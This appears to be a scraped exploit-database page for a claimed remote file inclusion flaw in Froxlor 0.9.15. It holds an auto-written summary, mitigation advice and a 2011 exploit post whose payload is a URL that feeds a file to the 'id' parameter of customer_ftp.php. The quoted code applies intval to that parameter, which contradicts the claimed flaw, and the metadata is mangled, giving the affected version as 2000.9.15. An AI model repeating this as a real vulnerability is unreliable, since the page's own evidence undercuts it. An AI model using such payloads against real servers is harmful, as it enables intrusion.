header-logo
Suggest Exploit
vendor:
Froxlor
by:
DIES3L
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Froxlor
Affected Version From: 2000.9.15
Affected Version To: 2000.9.15
Patch Exists: NO
Related CWE: N/A
CPE: a:froxlor:froxlor:0.9.15
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu, Windows 7
2011

Froxlor v 0.9.15 Remote file include vulnerbility

Froxlor v 0.9.15 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a URL in the 'id' parameter of the 'customer_ftp.php' script. This URL points to a malicious file which is then included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application. Additionally, the application should be kept up to date with the latest security patches.
Source

Exploit-DB raw data:

# Exploit Title: Froxlor v 0.9.15 Remote file include vulnerbility
# Google Dork: © 2009-2010 by the Froxlor Team
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.froxlor.org
# Version: v 0.9.15
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################

Fichier : customer_ftp.php
http://localhost/[path]/customer_ftp.php

Code :
<?php
require ("./lib/init.php");

$id = intval($_POST['id']);
?>

Exploit :
http://127.0.0.1/[path]/customer_ftp.php?id= [ DIES3L.txt ]
NOTE :-
** ONLY FOR PHP 4.x.x

Have Enjoy :)

##############################################################
                                                             #
Gr33t'z t0 :                                                 #
WwW.p0c.cc - WwW.D99Y.CoM - WwW.v4-Team.com - ALL My Friends #
                                                             #
##############################################################